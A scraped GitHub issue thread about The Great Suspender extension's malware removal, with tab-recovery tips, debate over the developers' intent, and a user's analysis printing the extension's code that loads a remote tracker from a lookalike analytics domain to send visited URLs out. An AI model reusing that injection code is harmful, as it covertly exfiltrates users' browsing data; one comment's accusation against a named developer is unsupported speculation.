pb-3 markdown"> <p><strong>@rex</strong> I have not seriously thought of the new maintainer as acting in good faith since I set the title to note the probable malice last November, and certainly not since the first people to get a good analysis of the script came in early January.</p> <p>I am going to be taking a more serious look at Marvelous suspender, to try and see if it is, in fact, legitimate.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I fortunately had Session Buddy installed in addition to Great Suspender, so here's what worked somewhat for me. Not ideal, but at least the last URL of each tab is back.</p> <ul> <li>In Session Buddy, Settings -> Export. Exported as JSON.</li> <li>Used an editor to remove all chrome-<a rel="nofollow noopener" target="_blank" href="extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.">extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.</a><em>uri= (That .</em> is a regular expression match; in some editors you might need to some other form of wildcard match.)</li> <li>Imported the resulting JSON back to Session Buddy.</li> </ul> <p>This doesn't preserve tab history, and (surprisingly, to me) all tabs are opened in one window. But at least they're back.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8977507?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="vttale picture"> <strong>vttale</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>For those who still have the tabs open (@aruku) or have them backed up in TGS saved session or some other extension - here's the process to recover them:</p> <ol> <li>Make sure you have all your tabs open (either open already or from backup)</li> <li>Manually Install TGS from github (there is explanation in the header)</li> <li>You'll get a working TGS version, but it'll have a different extension id - so it won't open you old tabs</li> <li>Go to Session management page of the new extension and export current session - you'll get a txt file</li> <li>Open this file and replace the old extension id (first part of the URL) with the new extension is (pick it up from new extension settings page) - you can do replace all</li> <li>Go to Session management page of the new extension and import the edited file back</li> <li>Now you have a saved session with working urls</li> </ol> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/27927504?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="ronenabra picture"> <strong>ronenabra</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@rex</strong> I have not seriously thought of the new maintainer as acting in good faith since I set the title to note the probable malice last November, and certainly not since the first people to get a good analysis of the script came in early January.</p> <p>I am going to be taking a more serious look at Marvelous suspender, to try and see if it is, in fact, legitimate.</p> </blockquote> <p>So for the time being you do not recommend marvellous suspender? If yes, what alternative _would_ you recommend.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/62667610?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TrainerGamer picture"> <strong>TrainerGamer</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Sorry in advance if this is a dumb question but is there a way to find out if the extension was already disabled before it was removed by Chrome? If yes, can I find out when it was disabled?</p> </blockquote> <p><strong>@1oh1</strong> I had found out what was going on when I went to my extensions for a different reason and scrolled down to see the red text that said "this extension contains malware." It was disabled before I removed it, so I think Google Chrome did it automatically (because it had been enabled before, eugh).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/32376686?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TacoTheDank picture"> <strong>TacoTheDank</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 🎉<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I use <a rel="nofollow noopener" target="_blank" href="https://github.com/wylie39/Thesuspender">https://github.com/wylie39/Thesuspender</a>, But it does require you to build it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/16432131?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="wylie39 picture"> <strong>wylie39</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>We need to petition Google/Microsoft to make it a requirement to notify all users when the ownership of an extension/repository is changed.</strong> </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8659480?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="samomar picture"> <strong>samomar</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">60</span> ❤<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@TheMageKing</strong> Thanks for all you've done over the last few months of this debacle. I spend a lot of time in GitHub, being a dev myself, but I just never really wandered around in this particular neck of the woods. My experience with TGS over the years has been so unfailingly great I just never worried about it. I suppose that's one of the reasons I'm so gutted (and possibly overreacting) now, it's literally like being betrayed by an old friend.</p> <p>I think I'll just check out this repo, roll it back to a stable tag, and load it as a developer extension. No need to fix what isn't broken, I guess. </p> <p>Also changing all my passwords. Or at least the important ones.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strike>Thank you @ronenabra. That looks like a good workaround, but as far as I can tell, the tabs I have already open would still require me to click back or edit the address bar, right?</strike><br /> I ended doing that to be able to _unsuspend_ all my windows before _closing_ them into the Tabs Outliner tree. I'm finally cured from the window/tab madness while maintaining a record of tabs I might want to go back to!</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3179605?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aruku picture"> <strong>aruku</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>We need to petition Google/Microsoft to make it a requirement to notify all users when the ownership of an extension/repository is changed.</strong></p> </blockquote> <p><a rel="nofollow noopener" target="_blank" href="https://change.org">https://change.org</a> maybe? ¯\_(ツ)_/¯</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/62667610?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TrainerGamer picture"> <strong>TrainerGamer</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">12</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>This happened in <strong>November</strong> and Google just removed the extension? What in the world?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/11562215?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="orlandoryo picture"> <strong>orlandoryo</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 😕<span class="ml-2 mr-3">11</span> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>As already said in here, I recovered my tabs following these steps:</p> <ol> <li>Go to your Chrome history (chrome://history) or press the shortcut <code>Ctrl+H</code>:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942573-1b914480-6703-11eb-8b79-4c9ac0083e43.png" alt="image" /></li> <li>Search for the extension prefix URLs: <code>chrome-extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html</code><br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942008-652d5f80-6702-11eb-97ea-d3d3c7f74026.png" alt="image" /></li> <li>Open the tabs you need (or all of them). It will appear some "bugged" links like this:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942162-9c037580-6702-11eb-98d9-3400f604b251.png" alt="image" /></li> <li>Remove the link part up to <code>&uri=</code>:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942327-d1a85e80-6702-11eb-8bf8-aa7546d1c5bb.png" alt="image" /></li> <li>You now have your recovered link:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942398-e8e74c00-6702-11eb-90b7-2d22203d9b9b.png" alt="image" /></li> </ol> </blockquote> <p>Recovered a few hundred tabs this same way after Chrome auto-disabled the extension without warning. Wish I saw in time the suggested method of trying closing your browser and reopening it to get the extension temporarily enabled again, that could've saved a lot of time and manual effort. It worked for my brother.</p> <p>What a mess. Considering TGS _was_ the tab backup solution for many people like me, the fact that we can't re-enable it to get back our tabs is a nightmare scenario. This will blow up pretty fast....</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Gotta thank the OP for the extensive informational post. But highest props for actually suggesting <a rel="nofollow noopener" target="_blank" href="https://bitwarden.com/">Bitwarden</a> as a password manager, since it's pretty obscure. It's by far the best, and I've tried them all - LastPass, 1Password, the whole gamut. I've been advocating for Bitwarden for years, but nobody seems to know about it, quite the shame. So I'm glad it will get more exposure from this.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I see that currently, the closest alternatives for replacing TGS right now are to load it personally from a previous version or load the one by <a rel="nofollow noopener" target="_blank" href="https://github.com/aciidic/thegreatsuspender-notrack#the-great-suspender---without-analytics-tracking">acciidic</a>; as well as the Marvellous suspender, personally from<a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender#the-marvellous-suspender"> the code,</a> or as an <a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa">extension</a>. I don't really know much about coding so which one would be the option, or is there an even better option?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/78563731?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheEmperorman picture"> <strong>TheEmperorman</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I can confirm with confidence that the code in the Marvelous Suspender chrome package matches that on Github, but they made some pretty extensive changes in their fork (at least from a lines-changed perspective), and I don't have the time to review them all. I am willing to bet there is a very good reason for all their changes, but I simply don't have the time to look at them now closely enough to say "Yes, it's secure, everyone go use it".</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">11</span> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@TheMageKing</strong>: Your first 2 dates are mistyped in your edit log:</p> <blockquote> <p>Edit 01: (2021-11-06) add details from this discussion<br /> Edit 02: (2021-11-06) Update to reflect the newly discovered evidence for malice</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Thank you @ronenabra. That looks like a good workaround, but as far as I can tell, the tabs I have already open would still require me to click back or edit the address bar, right?</p> </blockquote> <p>After going through the described process I've just closed all open windows and then clicked on "open and suspend" on the imported session - and all my windows & tabs got restored (and immediately suspended again) using the sideloaded TGS version from the github</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/27927504?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="ronenabra picture"> <strong>ronenabra</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1304#issuecomment-773534043">#1304 (comment)</a><br /> this method worked perfectly !!!!!!! i export all my tabs through this method !!! try it</p> </blockquote> <p>Thank you so much! I was getting worried that I wouldn't be able to recover all my sessions from over the years.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/34446698?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="JJCUBER picture"> <strong>JJCUBER</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@Koolstr</strong> no they aren't..... I edited this 9 months in the future, obviously. Then I got back in my time machine, and kept editing it.</p> <p>Anyways, I fixed it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> 😄<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>If I were <strong>@deanoemcke</strong> and I wanted to exploit my users by inserting tracking code to make quick cash, I would create a new user and pretend to "sell" the extension to them, so that I could have plausible deniability that I made the suspicious changes myself. Just saying.</p> <p>As someone who has had popular extensions for years, and received numerous offers to buy them, I know for sure that 100% of them have malicious intent. Any developer with a scrap of integrity would NEVER consider selling a browser extension with 1M+ users.</p> <p><strong>@deanoemcke</strong> deserves to be raked over the coals.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2974436?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="matt-kruse picture"> <strong>matt-kruse</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">20</span> 👎<span class="ml-2 mr-3">7</span> 👀<span class="ml-2 mr-3">5</span> ❤<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>well... this escalated quickly</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3221810?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="mkiisoft picture"> <strong>mkiisoft</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Thread archived in the Wayback machine, should anyone need to cite it or refer to it in the future:<br /> <a rel="nofollow noopener" target="_blank" href="https://web.archive.org/web/20210204195157/https://github.com/greatsuspender/thegreatsuspender/issues/1263"><a rel="nofollow noopener" target="_blank" href="https://web.archive.org/web/20210204195157/https">https://web.archive.org/web/20210204195157/https</a>://github.com/greatsuspender/thegreatsuspender/issues/1263</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5680603?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Danw33 picture"> <strong>Danw33</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> ❤<span class="ml-2 mr-3">5</span> 😄<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>well... this escalated quickly</p> </blockquote> <p>Nowhere near as quickly as it really should've escalated tbh</p> <p>Freaking months I was using literal malware...</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/61645933?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Weaver-Naught picture"> <strong>Weaver-Naught</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">7</span> ❤<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I had still 7.1.8 running, WTF<br /> Removed it right on the spot.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7301634?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="v-karbovnichy picture"> <strong>v-karbovnichy</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>If I were <strong>@deanoemcke</strong> and I wanted to exploit my users by inserting tracking code to make quick cash, I would create a new user and pretend to "sell" the extension to them, so that I could have plausible deniability that I made the suspicious changes myself. Just saying.</p> </blockquote> <p>This is rampant speculation bordering on conspiracy theory. This is a little far-fetched for me. From every interaction I've seen of his, <strong>@deanoemcke</strong> is a good dude, certainly not the level of cartoonishly evil bond villain required to do something like you're suggesting.</p> <blockquote> <p>As someone who has had popular extensions for years, and received numerous offers to buy them, I know for sure that 100% of them have malicious intent. Any developer with a scrap of integrity would NEVER consider selling a browser extension with 1M+ users.</p> </blockquote> <p>Dev here, the number would have to be <strong>really</strong> high to get me to sell my extension, _especially_ knowing the person buying is almost certainly doing it in bad faith. I had an extension and I was super super stoked when I got to like 200 users. Millions? That's basically rockstar status, something for the resume, makes oneself a pillar of the open source community, etc. The fact that this was sold off at all is certainly troubling, though without more context I won't judge <strong>@deanoemcke</strong> too harshly. I wish he hadn't done it, and I'd love to know more about the context of the sale.</p> <blockquote> <p><strong>@deanoemcke</strong> deserves to be raked over the coals.</p> </blockquote> <p>Might be water under the bridge at this point, but I would certainly appreciate hearing his reaction to all this.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> ❤<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Since this was reported to Google in November and assuming they've received a spike in the amount of reports of abuse in the web store page, it baffles me that users weren't notified at all.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1761147?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="danielcardoso5 picture"> <strong>danielcardoso5</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">14</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>well.. google finally notified the removal of the extension because of malware.. and after a quick search brought me here.. thanks guys..</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1264114?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="carlos-garcia picture"> <strong>carlos-garcia</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Thread archived in the Wayback machine, should anyone need to cite it or refer to it in the future:<br /> <a rel="nofollow noopener" target="_blank" href="https://web.archive.org/web/20210204195157/https">https://web.archive.org/web/20210204195157/https</a>://github.com/greatsuspender/thegreatsuspender/issues/1263</p> </blockquote> <p><strong>@TheMageKing</strong> Well, looks like your date typo is saved for eternity, evident in perpetuity. 🙃<br /> You trying but failing to make changes with your time machine.... we must be living on the Beta world line. El Psy Kongroo.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>The fact that this was sold off at all is certainly troubling, though without more context I won't judge <strong>@deanoemcke</strong> too harshly</p> </blockquote> <p>Agreed - he wrote and distributed it, and closed over 800 tickets over half a decade, for free. GH issues aren't really a great venue for editorializing, but I posted <a rel="nofollow noopener" target="_blank" href="https://nfultz.github.io/notes/chrome-tgs.html">an op-ed on my site</a> about this.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/418638?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="nfultz picture"> <strong>nfultz</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>Keep in mind: I only checked the script Wayback Machine captured. The server might as well have served something entirely different at other times or under certain conditions!</strong><br /> See my comment below <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-773605683</p> <hr /> <p>I checked the chrome 7.1.8 and 7.1.9 CRX and also the tracking js found here:<br /> <a rel="nofollow noopener" target="_blank" href="https://web.archive.org/web/20210103184129/https">https://web.archive.org/web/20210103184129/https</a>://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</p> <p>I actually ran the file locally the same way the 7.1.8 extension loaded it and it looks like only <code>trackPageView</code> was was called on owa, sending the URLs of visited pages to <code>https://cdn.owebanalytics.com</code>.</p> <p>7.1.8 js/gsAnalytics.js</p> <pre><code class="prettyprint">var owa_baseUrl = 'https://cdn.owebanalytics.com/'; var owa_cmds = owa_cmds || [] function loadOpenWebAnalytics(version) { owa_cmds.push(['trackPageView']); (function () { var _owa = document.createElement('script'); _owa.type = 'text/javascript'; _owa.async = true; _owa.src = owa_baseUrl + 'owa/modules/base/js/owa.tracker-combined-latest.minified.js?siteId=klbibkeccnjlkjkiokjodocebajanakg&apikey=2cf3d852ab70d359456ce3a0aac237a3&v=' + version; var _owa_s = document.getElementsByTagName('script')[0]; _owa_s.parentNode.insertBefore(_owa, _owa_s); })(); } </code></pre> <p>Owa seems to be capable of tracking clicks, key presses, mouse movements and all kinds of actions but <strong>to me it looks like it "only" captured the visited site urls.</strong> </p> <p>Also, it seemed to respect the opt-out setting:</p> <pre><code class="prettyprint">function init() { if (!gsStorage.getOption('trackingOptOut')) { loadGoogleAnalytics( window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga' ); let details = chrome.runtime.getManifest(); loadOpenWebAnalytics(details.version); } gsAnalytics = gsAnalytics(); } </code></pre> <p><strong>From what I read I'd say that no key presses were captured.</strong><br /> Don't quote me on this, I never wrote a chrome extension, just grep'd through the two versions and reading the tracker code.</p> <p>It's still very suspicious to register a domain that sounds like Open Web Analytics but <a rel="nofollow noopener" target="_blank" href="https://github.com/Open-Web-Analytics/Open-Web-Analytics/issues/703">has nothing to do with it</a>..</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1471525?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="ne0phyte picture"> <strong>ne0phyte</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Hi everyone.<br /> It is extremely unfortunate what has happen overnight with the extension being removed from the. I am deeply sorry for how this must be affecting users. </p> <p>I had recently been in contact with the new maintainer (a few days ago) and we have been working together to try to find a way forwards that would reestablish trust in this extension. I had a gitHub post prepared outlining some of the decisions we had come to and actions that they should take, but that post and its contents seem moot now.</p> <p>As I mentioned in my initial post about the change of ownership, I really wanted to step away from this project to work on other things. I apologise for not intervening sooner than this (and now too late).</p> <p>FWIW, I have trust in the current maintainer and believe their actions and intent were never malicious. They seemed genuinely distressed at the way this changeover has played out. I believe this bad situation is mainly a result of bad (or lack of) communication. It's important to state here that this is purely my personal intuition - a feeling that involves trust on my part.</p> <p>As far as I am aware, the version of the extension on the chrome webstore contained none of the suspect code that caused suspicion from the community. Do you suppose Google have removed it as punishment for the previous release? Personally, the extension still seems to be running fine on my machine. Perhaps if I force an update it will be removed and all the suspended tabs will disappear? I would be keen to help where I can - although I suspect the only real option to restore these tabs will be relying on a separate backup extension (like session buddy).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1051763?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="deanoemcke picture"> <strong>deanoemcke</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">29</span> 👎<span class="ml-2 mr-3">16</span> 😕<span class="ml-2 mr-3">13</span> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>FWIW, I have trust in the current maintainer and believe their actions and intent were never malicious. They seemed genuinely distressed at the way this changeover has played out. I believe this bad situation is mainly a result of bad (or lack of) communication. It's important to state here that this is purely my personal intuition - a feeling that involves trust on my part.</p> </blockquote> <p><strong>@deanoemcke</strong> What exactly is their intent?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5001650?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="RexYuan picture"> <strong>RexYuan</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Hi everyone.<br /> It is extremely unfortunate what has happen overnight with the extension being removed from the. I am deeply sorry for how this must be affecting users.</p> <p>I had recently been in contact with the new maintainer (a few days ago) and we have been working together to try to find a way forwards that would reestablish trust in this extension. I had a gitHub post prepared outlining some of the decisions we had come to and actions that they should take, but that post and its contents seem moot now.</p> <p>As I mentioned in my initial post about the change of ownership, I really wanted to step away from this project to work on other things. I apologise for not intervening sooner than this (and now too late).</p> <p>FWIW, I have trust in the current maintainer and believe their actions and intent were never malicious. They seemed genuinely distressed at the way this changeover has played out. I believe this bad situation is mainly a result of bad (or lack of) communication. It's important to state here that this is purely my personal intuition - a feeling that involves trust on my part.</p> <p>As far as I am aware, the version of the extension on the chrome webstore contained none of the suspect code that caused suspicion from the community. Do you suppose Google have removed it as punishment for the previous release? Personally, the extension still seems to be running fine on my machine. Perhaps if I force an update it will be removed and all the suspended tabs will disappear? I would be keen to help where I can - although I suspect the only real option to restore these tabs will be relying on a separate backup extension (like session buddy).</p> </blockquote> <p>Can you _categorically_ say that there was no malicious intent and that no data not explicitly required for the extension to operate was taken/used from peoples machines?</p> <p>There are some pretty serious allegations and I just think people want answers...</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/62667610?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TrainerGamer picture"> <strong>TrainerGamer</strong> <span 